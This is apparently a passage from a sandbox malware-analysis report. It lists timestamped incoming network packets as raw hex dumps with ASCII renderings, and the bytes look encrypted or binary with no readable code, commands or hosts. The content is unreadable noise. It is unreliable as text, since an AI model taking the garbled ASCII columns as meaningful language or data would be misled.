ce ec 20 b7 fe 0c df d7 d6 e5 03 3f 55 54 10 b7 9e 35 d6 21 f4 42 90 a2 f1 48 f6 fb 57 60 ec e4 cb 22 93 43 87 bd c0 b1 56 96 ec c9 18 7c eb d8 52 0e 81 03 9f 9c 2f 70 81 ae d6 51 92 c1 3c 9b 89 02 d3 c1 23 62 2a e8 b4 3d 11 ab 9c 26 Data Ascii: yr`vb_fulq?p8@t0D#dXx.?ZE\qFV3RYZnwi%@%v6W$-c#DC"7Xs:!;&0#Dj%#a`6\\/ ?UT5!BHW`"CV\|R/pQ<#b*=&
2022-10-03 14:13:31 UTC	174	IN	Data Raw: 58 bf a2 be 55 0e da 6d 42 bd e6 b8 6d 63 cd 38 07 43 1f 61 28 65 f6 3e cc d0 d5 aa 4c 3d a4 5e 2d c4 13 90 42 ed 1b f1 ca 03 60 96 e8 f2 e4 6e 39 8a fe ed bc df db 87 f8 ba e4 c7 fd ec df cd 47 77 02 4c c9 af 35 ae e5 24 8a 70 97 93 56 76 75 68 29 f7 6a 21 1a 19 3b 62 79 21 be b2 d7 18 3b c1 47 5d d3 dd 94 ee b5 39 c7 ab 22 f4 1d 17 f7 b3 4c 8b 52 ec 39 35 14 5c c0 cb bc f6 25 6e 33 96 2e a2 4d e4 00 65 d0 ac d8 c9 f2 14 61 69 a7 bb 65 46 1a 3f 0c 74 13 27 82 59 47 cb 4e 68 15 06 66 85 6b a9 87 c5 d8 af 17 9a 70 4c 78 06 b2 dd 7a 77 5f 93 8e b9 f7 20 ab 3b 57 cc 03 94 3e 16 08 00 2e cc 4f 19 96 24 d1 f5 4d 93 5b 3b d8 f5 6b 1e 83 56 c0 0a 2d 58 48 87 5a cd 6f 46 ce f8 6e 7f 03 53 79 be a0 7c 0b a9 0d 0a 76 a2 16 e6 6b a0 46 73 5a 2e 65 af 42 23 46 90 72 Data Ascii: XUmBmc8Ca(e>L=^-B`n9GwL5$pVvuh)j!;by!;G]9"LR95\%n3.MeaieF?t'YGNhfkpLxzw_ ;W>.O$M[;kV-XHZoFnSy\|vkFsZ.eB#Fr
2022-10-03 14:13:31 UTC	175	IN	Data Raw: f4 d2 75 4a 52 ab d8 f2 eb c7 6d 66 5e 2a d0 6e 18 1e 71 41 b4 ca e7 a9 e2 6e 38 39 f7 19 b8 2a dd f3 80 76 cb 0f d0 98 f2 4b a6 01 3c 38 af 6f 77 88 30 bb e4 4e c2 c0 4e 0e 7c 1e 62 5f 8a 42 c0 3b 17 51 f0 f1 2b 3c 1a 73 fe f0 08 a9 ce b7 fc e6 22 68 96 47 c0 42 fa 74 a6 7a bd 84 c8 14 b3 ca 7e 71 6e 1e 58 78 2d b8 18 9d 0f e4 58 0a 0f b0 56 73 e1 46 7f c0 b5 f1 bc a7 43 63 e7 38 58 e0 0e 59 57 7b 70 cd 2a 59 43 a7 70 c7 19 6b 81 25 d6 b3 72 75 cd ff 52 26 cd 83 3d 55 c8 dc 7f b2 73 9f cc e8 71 ae 0e d0 ac 41 22 37 12 81 c8 2a bd 6f d7 c7 1f b3 de de c2 cb 05 6a 1f d3 9b 23 48 6a af bb e5 d1 a0 10 ad 61 fd d7 89 07 71 58 f4 f6 2e b3 84 df 9a b5 54 88 c9 b7 97 31 b1 cb 57 5e 2f 1e 58 7a 13 cf cd 3b 8d 87 25 c7 0b 3d 55 54 86 21 70 e8 e2 16 a6 12 85 a3 f9 Data Ascii: uJRmf^nqAn89vK<8ow0NN\|b_B;Q+<s"hGBtz~qnXx-XVsFCc8XYW{pYCpk%ruR&=UsqA"7oj#HjaqX.T1W^/Xz;%=UT!p
2022-10-03 14:13:31 UTC	177	IN	Data Raw: a5 5b bd e5 9c bb 5b 31 cc 90 78 b7 70 aa 66 c4 ea 5d ed 71 10 1a 78 8c 15 43 00 55 7b bf 78 ff 8d be 53 91 00 b8 b0 04 5c 82 2a a0 e7 37 93 60 ad f4 c2 2e 90 08 c2 f0 a8 57 0e da fb d4 6e bf 89 5a 31 9d a7 8b 55 1d 61 28 f3 60 38 0d f8 e2 f8 1c fc 4b 48 2f c4 13 06 d4 10 9c c0 fd 51 30 74 21 e4 e6 6e 39 1c 68 a3 ae f4 ec d5 a8 be cc d0 ff ec df 5b d1 50 c5 7d fe fd 65 88 ec 33 88 70 97 05 c0 27 50 43 1e a5 3a 69 7c 0e 39 62 79 b7 28 e9 3f 29 0c 93 17 34 97 ca 96 ee b5 af 51 25 8f e0 2a 45 a7 38 e9 9c 50 ec 39 a3 82 d9 da fb 8b a4 75 c3 b1 81 2c a2 4d 72 96 dd 27 bf ef 9b a2 db 81 7e a5 bb 65 d0 8c 90 4f 44 24 75 d2 a8 86 dc 4c 68 15 90 f0 a3 4e b7 b0 97 88 bc 28 8e 72 4c 78 90 24 04 1e 47 68 c1 de 8d e9 34 a9 3b 57 5a 95 68 73 08 3f 52 7e 99 32 0d 94 24 Data Ascii: [[1xpf]qxCU{xS\7`.WnZ1Ua(`8KH/Q0t!n9h[P}e3p'PC:i\|9by(?)4Q%E8P9u,Mr'~eOD$uLhN(rLx$Gh4;WZhs?R~2$
2022-10-03 14:13:31 UTC	177	IN	Data Raw: b2 fb 9a b3 bd a5 ee 5f 18 51 7f ed 31 54 b4 67 c5 9e 23 44 83 38 d6 ad 02 f4 ff c9 bc 87 89 c3 0e 56 28 7e b4 59 85 9e 6a 64 db c4 38 90 75 dc ec 0e 39 1a 0a 1a 95 b6 1b 03 e3 e2 6e 06 66 69 05 24 fd 3c 92 4a ab 8d 00 72 b3 f1 22 46 13 67 8f 2b 65 36 67 b7 e3 f4 24 5f c7 2d 39 50 f1 05 c9 24 52 e1 85 c5 cf b4 61 c5 70 cb 29 c7 fe 1d 43 21 e1 19 2b 1b 73 d6 b0 30 82 75 cb ba 2f 9d bf b0 75 0e 5a 49 d2 95 35 9d da 00 bb c1 37 ce 30 4a 2b fc b1 3b 4a a7 fd a8 d0 08 eb 24 6b cc 90 28 b7 69 11 64 59 e9 68 79 21 90 6a 78 8c 45 43 3b ee 79 ab 6e ca 19 ee fa 09 00 b8 e0 04 00 39 28 67 e4 02 07 30 13 5a c2 2e c0 08 bf 4b aa 17 19 ef 6f 84 bd 63 89 5a 61 9d 38 30 57 ec 62 1d 67 30 3e e1 f8 e2 a8 1c 3d f0 4a ce dc 26 92 84 ed be c3 fd 01 30 96 9a e6 fd 6a 0c 88 38 Data Ascii: _Q1Tg#D8V(~Yjd8u9nfi$<Jr"Fg+e6g$_-9P$Rap)C!+s0u/uZI570J+;J$k(idYhy!jxEC;yn9(g0Z.KocZa80Wbg0>=J&0j8
2022-10-03 14:13:31 UTC	179	IN	Data Raw: 10 c2 12 6d 5a de 87 db 70 5a 6f 98 cd f8 39 01 6a 39 bc 36 7c df 3a 38 f3 08 97 a1 a0 69 fa 06 71 cc 2e 81 12 77 84 17 a5 a7 5f 92 0d fc ac 12 6e 73 93 6c 10 ab a9 3f 1d 45 cd fc 2b 4d c1 1c 49 44 07 15 38 90 dd ab c3 b6 a4 1e 4b 01 1c 6f ba 9f 15 fa 7d 83 0b 40 22 25 3f ce cc 8a 81 89 61 6a 37 7b ad 55 72 a9 1c c8 05 84 d6 65 51 8a 9c 29 92 6a 27 ec 96 15 19 39 8d 0f 2f f5 fb 31 35 ac 29 0e 4e 14 87 c1 32 de 9f 51 cd 4a ca 25 26 ba 2c 29 ff 69 a7 bb 7e 42 41 17 7c da 2a 59 de 80 47 42 29 84 bd a0 38 d2 60 cb 65 15 f7 74 1c 9e ea e3 60 30 5d 15 03 4c 80 76 29 6e 7a 5a bd 11 ee c1 75 6e 29 08 1e 70 66 ba d4 f2 99 48 67 a9 1e f2 6d 90 5a 64 0e 2a 9e 4e 3d 0d 44 43 72 ca 4a e8 d5 6c 68 39 98 39 a2 29 e8 f1 46 76 2f 58 e7 9a a2 4b 2b 20 52 2c 9a 6d b1 88 ef Data Ascii: mZpZo9j96\|:8iq.w_nsl?E+MID8Ko}@"%?aj7{UreQ)j'9/15)N2QJ%&,)i~BA\|YGB)8`et`0]Lv)nzZun)pfHgmZdN=DCrJlh99)Fv/XK+ R,m
2022-10-03 14:13:31 UTC	180	IN	Data Raw: e3 c8 dd 0c b5 93 1a fc 5b e1 04 62 b9 55 2f 63 1c ce 7a 20 47 f8 75 d8 b2 d4 b5 09 ae 19 56 10 21 9e 7a d7 2b dd 27 92 d0 fb fe ba f9 57 f6 ec bb cd 64 94 26 85 a9 ca 65 1a 94 ec 5f 18 c7 e9 8b 7b 6b 83 35 95 66 63 72 81 38 d6 3b 94 5c 3b fe 8b d5 d9 d9 6e 60 2a 7e b4 cf 13 13 b5 43 ec 96 68 ab 77 ea ee 0e 39 8c 9c fa 7b 81 2c 51 b3 bf 53 30 64 69 05 b2 6b 62 9a 6c 9c df 50 0d 6f c7 20 46 13 f1 19 2c 76 00 50 e5 b3 55 db 69 c5 2d 39 c6 67 be 8c 05 65 b3 d5 06 51 82 63 c5 70 5d bf e9 b1 2b 74 73 b1 fc 92 2d 71 d6 b0 a6 14 8b 8c 9a 18 cf ef b6 2e 39 58 49 d2 03 a3 35 a8 36 8c 93 67 e9 48 7d 29 fc b1 ad dc d2 5d 88 e7 5a bb 6d 7d fb 92 28 b7 ff 87 8c c5 df 5f 2b 71 fb 5d 4f 8e 45 43 ad 78 a1 b9 4d fd 4b be 77 dd 37 ba e0 04 96 af 14 a2 d2 35 55 60 bc a8 f5 Data Ascii: [bU/cz GuV!z+'Wd&e_{k5fcr8;\;n`*~Chw9{,QS0dikblPo F,vPUi-9geQcp]+ts-q.9XI56gH})]Zm}(_+q]OECxMKw75U`
2022-10-03 14:13:31 UTC	181	IN	Data Raw: 17 06 f0 85 ce 82 84 c3 bd ad 57 8c d2 14 7a 06 24 dd 8b 72 69 8c eb bb 96 36 6b 63 55 cc 95 94 f2 3d 57 06 4b ce 4d 0f 77 7c d3 f5 db 93 51 3e 0c ea 0e 1c a0 40 c7 53 2f 58 de 87 4d e6 ce 40 ab fa aa 69 26 0a 7b be 36 7c 49 ac 2d 16 13 a0 f3 f0 21 f9 44 73 cc 2e 10 9c 16 00 90 90 f5 0f 92 76 bd ae df 73 63 15 6e 62 ad 9c 2d 5d 46 50 bc 29 5d d1 18 df 44 e2 04 1d 93 8d ab 7d e6 b6 1f 4b 01 8a 7f 7f 98 20 f8 2d 83 eb 01 20 09 26 de 4a 88 b8 8b 54 78 77 79 af 14 70 b9 0c cb 93 84 de 72 74 8b cc 29 b1 3b 35 e8 96 15 8f 29 ed 08 1a f7 ab 21 60 e8 2b 0e 4e 04 01 c5 aa d6 aa 51 9d 48 ad 64 24 b9 0c 2b 69 69 3d b9 6b 44 11 17 f4 99 28 5a de 80 d1 43 6d 8a 88 a2 68 d0 e9 8e 67 15 f7 74 aa 9f 2e e1 55 32 2d 17 c8 0d 82 76 09 6d ec 5a 4a 03 fb c5 25 6e c5 49 3c 71 Data Ascii: Wz$ri6kcU=WKMw\|Q>@S/XM@i&{6\|I-!Ds.vscnb-]FP)]D}K - &JTxwyprt);5)!`+NQHd$+ii=kD(ZCmhgt.U2-vmZJ%nI<q
2022-10-03 14:13:31 UTC	183	IN	Data Raw: b5 b6 c4 9a 6d e4 45 aa b5 f3 8c 59 74 33 7d 80 46 16 e2 69 7e c6 b9 99 95 df 3b ca 33 64 84 d7 4f 20 97 7e 32 99 16 d0 00 1e 28 61 d5 cb e1 0d 9e 5b 65 d6 c4 af f5 db 2d b7 33 82 ef b5 fe 33 3b c8 46 5e 1e 1c 95 5b 06 d1 c1 3b be ad 16 e5 30 3f b0 43 ee 20 a7 ee 77 30 08 13 a9 82 82 6e 57 ff 6e f4 12 04 81 13 d0 11 dc d8 0a b3 1f 94 b7 7e b0 55 a0 ef b2 79 41 65 dc 9c ee 67 7f 39 8f af cf d5 2d cb d0 87 6e ce e3 62 73 7c 6d 52 d3 9e cf 74 b5 e7 da 94 6b ea 8a 15 85 1e f5 18 91 bf ee 01 fa e0 83 14 a6 6d 59 24 aa 3b 0f 5a d7 8d 53 5f e2 c5 71 44 48 46 c8 2f 49 37 86 bd 69 f0 e7 69 63 23 2a 50 e6 07 d9 14 22 e7 54 c7 35 89 a3 c5 f9 c9 a6 ef 4a 1a 87 23 87 0d d1 2a f0 d4 b4 25 45 71 23 ad 45 87 b9 b4 91 3b cc 56 c4 90 32 9f f2 22 9d c3 ee cc 5f 68 69 f9 40 Data Ascii: mEYt3}Fi~;3dO ~2(a[e-33;F^[;0?C w0nWn~UyAeg9-nbs\|mRtkmY$;ZS_qDHF/I7iic#P"T5J#%Eq#E;V2"_hi@
2022-10-03 14:13:31 UTC	184	IN	Data Raw: ba 9e d7 3c 5c a6 7a c5 c5 71 ff 39 74 87 07 f8 0e 89 b5 70 44 b7 17 2a cb 4e 29 87 ae 34 43 ef 34 8f ef a4 95 a1 89 73 b9 87 9e 4d 8f 2c 80 d0 18 a9 fd 45 6c 19 f7 f0 87 4c 88 be bb 88 f4 26 9f 72 1d 7d 7e 36 a6 1f c3 6b f7 cd f1 ca d7 a8 30 41 73 96 cd 61 66 1c c2 7e ad 18 54 b5 37 d1 9c da 7b cb 94 e1 16 3a 54 eb cf c7 76 2d 99 d9 3e d8 3f 5a 11 80 11 f6 a8 01 8f 6b 52 3a ad dd ae 2c 41 27 63 a3 f4 7b 6a 4e b2 cc 04 94 75 7b 78 17 c1 86 f6 9e af bc b0 1e 44 71 5c 6d 7a 8e 65 31 31 45 f6 a4 42 46 20 1d 79 4a f1 14 71 92 f0 82 53 f7 97 1a f1 01 a4 62 5e 9d 19 f9 18 8e 32 00 86 29 15 cc 33 8b b2 86 07 65 0e 7a 56 18 23 a4 75 c9 bf 89 8d 6f 85 89 c9 26 0e 28 c4 ed 84 03 f7 34 84 08 41 d6 2b 3c 31 ec ed 17 c5 19 c8 c1 a4 da 9f 51 e1 4a ee 45 bb b9 a8 29 3d Data Ascii: <\zq9tpD*N)4C4sM,ElL&r}~6k0Asaf~T7{:Tv->?ZkR:,A'c{jNu{xDq\mze11EBF yJqSb^2)3ezV#uo&(4A+<1QJE)=
2022-10-03 14:13:31 UTC	185	IN	Data Raw: c2 1b f5 08 33 c9 ca 75 b3 e1 a2 e9 01 86 4e 9c ec 17 41 03 96 5f 04 0e 3c ec b9 57 2d 1f fd 0b fe 63 ac 1f 5f 93 84 42 fa 81 32 d9 ac 06 6f e0 6c 3f 7b c9 95 ed e9 0c d7 fd 83 21 17 4c fe b2 e8 24 8c 95 92 01 f6 8e 36 a6 d4 73 50 dc da d0 1b 9b 33 96 86 8d 6b 04 26 21 10 ed 22 b0 41 3a 7d d9 ec a1 54 20 22 67 f8 31 e2 85 64 1d 7e 95 4d fe 92 e9 7f 7d 38 53 e5 3e 4a d3 a3 23 b1 ec a3 c0 76 d6 1b 03 c4 48 b8 10 7a bf ff d7 e0 f6 df b6 d7 e2 b6 f6 b8 76 9d f5 29 cc 43 b8 83 87 0d ca 15 4e cf f8 b3 18 90 ee 4b 45 5a 80 b5 bf 21 2c 19 80 b1 f5 54 98 18 3e 06 af d2 c0 cf 22 21 0b 15 ad 4d 12 ca b7 e6 ee 2a 68 36 22 b1 fa 1a 38 ca b6 a5 7d 58 2e 0b 97 a4 00 2e 65 2a 24 78 75 18 b7 0d b7 fd 4e 56 23 15 0a f9 10 be 1a aa 7d 1f 50 6c b0 e4 b5 c6 db dc 3a 2d 4e 2b Data Ascii: 3uNA_<W-c_B2ol?{!L$6sP3k&!"A:}T "g1d~M}8S>J#vHzv)CNKEZ!,T>"!Mh6"8}X..e$xuNV#}Pl:-N+
2022-10-03 14:13:31 UTC	186	IN	Data Raw: e1 8c a0 ba f2 d3 eb e5 d1 cd c0 76 f7 50 f4 ad 71 af db 38 8a 70 82 92 7d 66 4d 76 04 f4 24 28 5c 0c 20 63 57 3b 21 b2 00 1d 4b c3 1e 5d f9 c9 0a e7 bc 39 15 aa 3b dc 21 15 ef b2 61 97 57 ec b5 34 60 52 de ce 19 f5 90 60 96 83 e4 a3 a6 e0 9f 65 fe 8b 00 c5 ab 14 7f 7d 57 b5 6d 46 a8 3d a7 75 2e 25 fa 5b ed de 44 68 39 04 b0 95 50 82 86 c5 c2 bf 0f 8c 4a 4e 93 02 2c dd 21 70 2f 91 d6 b9 86 34 e9 2b 5f cc d1 96 2b 2d 35 02 36 ce ef 01 9c 24 9d f7 8f 83 cf 3e bd f5 62 0e f8 40 96 08 73 48 d6 87 83 e4 b7 4a 96 f8 a6 6b 62 43 71 be 56 7e b7 bc 30 08 42 a0 ce e0 61 a0 2e 71 be 3e 89 84 1b 23 1c 99 ad 0f e6 74 57 aa 1a 6e 0b 07 29 62 a5 9c 41 4f 05 40 b4 29 cd c3 53 cf 4c e2 90 0f 60 83 a3 7d 7e a4 4a 5b 09 8a e3 6d e5 30 f0 2d 13 e9 81 30 20 3f 86 59 37 a8 8e Data Ascii: vPq8p}fMv$(\ cW;!K]9;!aW4`R`e}WmF=u.%[Dh9PJN,!p/4+_+-56$>b@sHJkbCqV~0Ba.q>#tWn)bAO@)SL`}~J[m0-0 ?Y7
2022-10-03 14:13:31 UTC	188	IN	Data Raw: ea ce f5 21 d4 10 cd 51 d8 4c 77 3d 8f 43 61 e1 a2 0d f0 63 00 e0 ad b8 4d a5 ad f5 f2 79 7b 77 7c 53 31 65 d2 6b b2 82 d6 04 d9 d8 80 42 da 0c bd 6a ab ab 46 8a 49 f5 8a 19 53 82 bd 60 c5 52 7c d4 49 fc 84 b0 0e 76 27 0c 16 f5 b2 4c 1b 6e 53 df 0e 4d 08 b1 4b f3 7c 7d f9 33 d0 a5 27 7f 38 eb f2 30 ee b6 19 42 a1 cb 94 a5 8d 8c 5f fd 2b b6 7a ea ce 59 5e 2f 0b 99 b8 2f 3b 75 ab de 4f 88 a3 c7 45 d2 31 73 23 ce 61 38 c7 73 1a 83 bc cb d8 0a 47 7b 6e d3 db 1e a1 43 dd cf 34 af b2 c3 58 a9 16 90 4f a9 2f 2d 51 f4 34 43 8e 03 b9 64 95 cf f6 26 96 98 ab fa a8 22 99 4b 15 01 b5 cc 80 34 9e 32 09 a0 1e 6a f0 da 66 d7 8a 0c 46 36 3c 32 50 d8 d9 91 4b b4 a3 7d 6f 73 28 cf 70 7d 00 46 39 bd f2 53 be 1c be 89 e9 d0 92 ef 52 a1 c7 e6 66 47 41 5b 18 7c af bb 78 53 14 Data Ascii: !QLw=CacMy{w\|S1ekBjFIS`R\|Iv'LnSMK\|}3'80B_+zY^//;uOE1s#a8sG{nC4XO/-Q4Cd&"K42jfF6<2PK}os(p}F9SRfGA[\|xS
2022-10-03 14:13:31 UTC	189	IN	Data Raw: 3e f3 ae 57 4d db e0 d5 2e 93 b8 58 22 9c b7 a7 26 30 65 28 26 61 af 1f 4c cd ac 1c 7e 67 d9 2e 02 3a 94 d4 ae 9f 60 fe b9 19 92 0c e6 e7 69 3b c6 62 e7 ba 85 ef 6e ab f4 ce d8 ff ac de 20 d2 50 eb 42 fc e9 64 41 c1 3b a4 7a 97 3f 99 74 45 1b 1d f1 ba 21 52 0d 39 63 79 20 28 b3 3c 1c 0e c3 17 5d b9 58 84 ee b5 3d 51 ab 9a d5 28 15 a7 b3 c7 9e 50 ed 39 ee 84 5c d9 ce 89 fe 75 6e 9f 83 2c a2 4d e4 96 65 32 80 ed e2 a5 14 af 7c a5 bf 65 46 8c 3f 4c 71 26 25 d2 59 a8 df 4c 80 31 06 f0 85 58 86 b2 c7 88 af 07 8c 72 4c 78 06 24 dc 1d af 72 91 de b9 c6 32 a9 3b 57 cc 95 94 64 3d 3d 02 7e c6 1d 10 80 24 d1 f5 db 97 c7 3e ed f7 3b 1e f0 40 c2 0a 2d 52 de 78 f3 e6 5a 44 9e fc fa 69 01 53 79 be 36 7c df ac 38 02 26 c1 8d f0 69 a0 46 77 cc 2e 81 84 77 21 16 90 a5 0f Data Ascii: >WM.X"&0e(&aL~g.:`i;bn PBdA;z?tE!R9cy (<]X=Q(P9\un,Me2\|eF?Lq&%YL1XrLx$r2;Wd==~$>;@-RxZDiSy6\|8&iFw.w!
2022-10-03 14:13:31 UTC	190	IN	Data Raw: b6 77 0f 16 ab 08 b6 60 95 1c 64 46 6e 08 29 7f 6a 2e 07 4d b8 08 cb a3 25 2c 39 6f 7d ba 48 99 f3 75 32 7e 7e a1 9a c7 0f bd 46 7a 38 c8 2b e1 ca d9 b8 92 09 92 84 37 2f 3b 5b 62 19 59 42 a4 68 22 1b e5 f1 14 58 18 11 bb f0 fd ec 18 d0 8c e4 17 2d e9 00 87 42 9d 31 30 38 02 93 be 50 e3 8e 99 50 29 58 58 3e fd b8 5f df 3a ae 4e 0a ad d7 54 11 a7 46 8a 86 81 8c cf a5 76 25 02 7f 1c e0 69 1f c1 39 1d c9 5c 1c 13 e3 30 e5 5e 2c 81 63 07 b3 c2 2e f8 b5 45 26 85 e6 3f 37 8f dc 8a f5 2d ff be ea 44 e9 44 94 e9 41 45 70 84 c3 55 37 cb 25 87 83 3b 91 99 96 c2 8d db 6a d0 9f ae 69 50 6a 40 d1 e7 b3 e8 10 58 29 f4 ad f4 05 44 10 44 b2 64 b3 e3 97 0c f7 da 8c bf fc c7 75 29 e9 10 17 2f 58 87 7a 67 98 f8 71 94 87 b1 80 7d 62 14 07 53 68 d7 ec b6 5d f6 70 d9 80 98 03 Data Ascii: w`dFn)j.M%,9o}Hu2~~Fz8+7/;[bYBh"X-B108PP)XX>_:NTFv%i9\0^,c.E&?7-DDAEpU7%;jiPj@X)DDdu)/Xzgq}bSh]p
2022-10-03 14:13:31 UTC	191	IN	Data Raw: 1a ce 86 0a f9 40 33 ba f6 28 f3 0d 87 21 a0 ea 1b 1f 71 d7 77 4d c6 21 43 5c 1d 0d e0 31 9b 1b f9 9f e7 62 d3 8e 60 6f d8 7c c8 95 52 64 04 43 94 98 4f a5 7b cc 94 ce 57 49 bf 19 84 cf d2 df 3d 12 ee 7a df 1e 79 61 67 15 05 50 4c a8 81 cc 1c 69 0e 38 4a a5 77 90 98 82 ff 91 ff 63 54 96 6f 82 e6 2f 5d ee 68 be f2 80 df c8 c9 d4 83 b5 9a 88 df 9f b8 1d a8 2c 9d c8 09 e3 a3 5f e9 17 f2 f7 c0 11 20 02 43 b9 5b 52 26 41 56 06 10 47 41 d7 58 1c 7d a6 63 02 f5 a9 e5 9a f8 56 35 c2 fc bc 4d 71 a7 c0 a2 ea 0f a9 57 54 e0 30 bc aa 89 93 10 1a c0 c1 55 d6 28 97 c2 17 53 e4 9e ad c7 66 dd 19 c1 bb 04 22 e8 60 09 1d 47 55 a1 3c cc de 05 1b 57 7f 80 e4 2b f1 d7 a3 88 c8 62 f8 2d 00 19 75 50 9c 7e 11 0f e2 ad dc a2 36 da 5e 23 93 d9 f5 17 49 7c 61 1d a9 6e 7c f1 40 d1 Data Ascii: @3(!qwM!C\1b`o\|RdCO{WI=zyagPLi8JwcTo/]h,_ C[R&AVGAX}cV5MqWT0U(Sf"`GU<W+b-uP~6^#I\|an\|@
2022-10-03 14:13:31 UTC	193	IN	Data Raw: 14 10 63 78 97 fe 5b 2a 90 e1 bc 27 4d e9 ed d6 37 82 bb e5 03 60 94 00 c4 ff 43 84 55 75 68 61 98 7f ed 15 4c 1d 9f 3f 39 41 a2 8d 44 03 a0 49 5b 15 12 fe 2b 80 12 29 26 c4 3c 8b 2e b3 35 01 0e 79 71 3d 6e 7b 1c 6f 6c af 11 84 9a 05 05 5c 0e 7f c8 45 b0 b5 7f 1a 1b 4e 8c f7 c7 4b e9 4f 78 51 c3 0a b5 e1 f1 dd d1 08 f3 b4 17 7b 17 73 07 5f 5b 27 97 61 43 20 d4 a6 07 74 6c 16 aa 99 f3 cc 18 e7 ac 90 3e 09 9a 12 95 30 93 00 55 2e 2d fe 98 16 b0 af ab 13 1e 7b 39 0c d2 d7 76 cd 53 8b 6d 0a 8b f4 20 3f 80 35 9d 81 e2 8b ec d6 60 37 6b 74 3f e0 5d 3c b5 37 3b ba 6b 1a 70 c4 12 96 68 3f e8 48 25 b3 ca 07 9d fd 50 43 85 c5 73 3c a6 b9 e9 f3 5d eb 9c 84 45 e2 2d 9c cb 41 75 45 ed f5 78 7b e1 03 e2 c7 14 f4 a8 81 8c ae e4 26 fe b9 cb 21 5b 05 4c fb 8e bf c5 10 77 Data Ascii: cx[*'M7`CUuhaL?9ADI[+)&<.5yq=n{ol\ENKOxQ{s_['aC tl>0U.-{9vSm ?5`7kt?]<7;kph?H%PCs<]E-AuEx{&![Lw
2022-10-03 14:13:31 UTC	193	IN	Data Raw: 85 7f 44 3c 9f f3 af 94 33 26 eb 8c 9f 69 49 36 15 ce 7d 19 a6 db 57 7a 42 e3 d7 84 1b c9 24 06 b8 4b 81 c3 12 4f 73 e2 c4 7b f7 12 ff c1 76 0b 32 71 18 10 c4 fe 48 39 20 50 f9 4d 24 b5 73 ad 06 90 7b 7a e1 ec c9 11 93 e7 6a 3f 73 e3 0d 1a ed 45 f8 6e ec 86 56 49 56 56 ac 36 ef f9 ff 20 1a 0e 19 da 60 15 a9 5a a1 ff e1 9f 16 10 fa a5 4b c4 5f 40 ec c5 61 ee 57 99 6c 68 93 e6 5e 14 98 47 6b 0f 60 65 b3 c3 b4 df 27 f8 4a e5 0d 40 df 61 46 0d 1c 51 dc 05 21 7c 72 b5 ef 5c 2b b7 e2 a4 36 28 8e cc c7 0e b3 bc e6 13 43 96 18 ff fb 6f 95 21 40 64 77 bd 79 e7 76 6d 0b 8e 2f 2d 64 be b1 76 1a a0 39 48 18 14 d5 37 95 1f 0b 26 df 3c 9b 02 a7 2c 01 0e 6e 6d 2c 6f 79 16 24 50 82 0c ce b3 09 06 78 7a 4d c8 43 bf 86 62 13 7e 5b 96 e9 c7 26 df 4c 47 7e c6 03 84 de f9 ca Data Ascii: D<3&iI6}WzB$KOs{v2qH9 PM$s{zj?sEnVIVV6 `ZK_@aWlh^Gk`e'J@aFQ!\|r\+6(Co!@dwyvm/-dv9H7&<,nm,oy$PxzMCb~[&LG~
2022-10-03 14:13:31 UTC	195	IN	Data Raw: 84 b8 64 b5 f4 e9 88 ea 97 50 13 9a 22 31 5d 7a 86 1b 53 b9 f8 7a b2 ea a6 90 7d 58 1d 35 63 49 9e aa bb 61 85 7a 90 cd 9a 3e 9e fb 30 93 98 72 88 6f f4 70 f2 8d ab d1 3a f3 bc 3e 6c 39 e9 aa 35 2a c7 10 f9 f2 7f 11 f5 50 d6 ea f1 80 6a ae e4 f5 89 a2 57 0a 2a 39 d1 2d 55 f1 f2 12 8b b4 38 f1 4e 80 ee 69 5c 6e c3 4d 17 d0 5a 69 b3 85 7b 46 3b 25 60 4a 0c 48 de 59 cd ea 24 3e 47 ab 47 32 7b 67 7e 4e 04 6a 11 da dd 80 f3 05 b1 61 5c 3e 00 71 c8 30 14 86 a1 9a 5f ef 0d b1 15 a5 cb 8b d2 70 11 57 d9 19 98 4a 05 81 d9 5e 70 1a d5 fb 7f e7 9b fc 05 55 3f 3d ba 95 e6 f3 cd 70 d9 aa 13 a6 06 2c 5d 9d c3 4f af f0 32 c9 8d 0a dc 41 47 a6 df 47 d9 1d ef 64 86 83 5d 38 18 90 57 24 8e 00 2a 3b 3e 10 bf 3f 96 1b f6 93 93 54 d3 e0 66 69 af 4b c9 e7 53 6c 60 76 8f f7 4a Data Ascii: dP"1]zSz}X5cIaz>0rop:>l95PjW9-U8Ni\nMZi{F;%`JHY$>GG2{g~Nja\>q0_pWJ^pU?=p,]O2AGGd]8W$*;>?TfiKSl`vJ
2022-10-03 14:13:31 UTC	196	IN	Data Raw: 59 a5 f6 3d f0 e6 a8 e3 ca 69 8c 01 29 0c 59 71 ae 78 00 3e fe b5 dc a8 36 e5 52 24 b8 f0 fa 64 5b 53 02 2d b5 6e 7b f1 49 ff b6 b4 fe b7 51 83 92 55 6a bd 2f a6 6f 41 76 9a e2 a8 8f 3d 2a 9e b5 93 07 01 10 11 df 58 1b ba ef 54 61 56 c0 cc 91 1b c4 05 1b ad 47 ef 84 24 44 73 fb ea 7d fb 11 d5 c0 12 24 1c 6c 02 62 ca f9 49 12 0a 03 ea 4c 3f b2 75 b0 2a e2 73 68 e6 d2 fd 18 84 d5 77 24 6f 8a 1c 0a ed 7f ae 48 f1 98 69 4f 4b 3f 9c 2e e6 ff ee 20 3e 02 09 dc 7d 1f c7 1c 8b fc ea a8 07 16 fb a5 46 df 2b 76 95 e5 61 ea 54 d3 44 55 d9 e8 5e 1d 9d 59 6b 3d 67 78 ae c4 d6 cd 36 e9 15 ec 14 54 d6 45 4a 08 1d 54 d6 25 40 76 72 80 c4 64 36 bd e1 a5 2b 22 e0 88 f1 11 a1 bd ef 0a 5c 99 12 e5 ec 43 80 21 5b 62 7b c8 69 e7 05 5d 07 82 3b 3e 6a b4 ad 25 3d bc 3a 68 15 0b Data Ascii: Y=i)Yqx>6R$d[S-n{IQUj/oAv=XTaVG$Ds}$lbIL?ushw$oHiOK?. >}F+vaTDU^Yk=gx6TEJT%@vrd6+"\C![b{i];>j%=:h
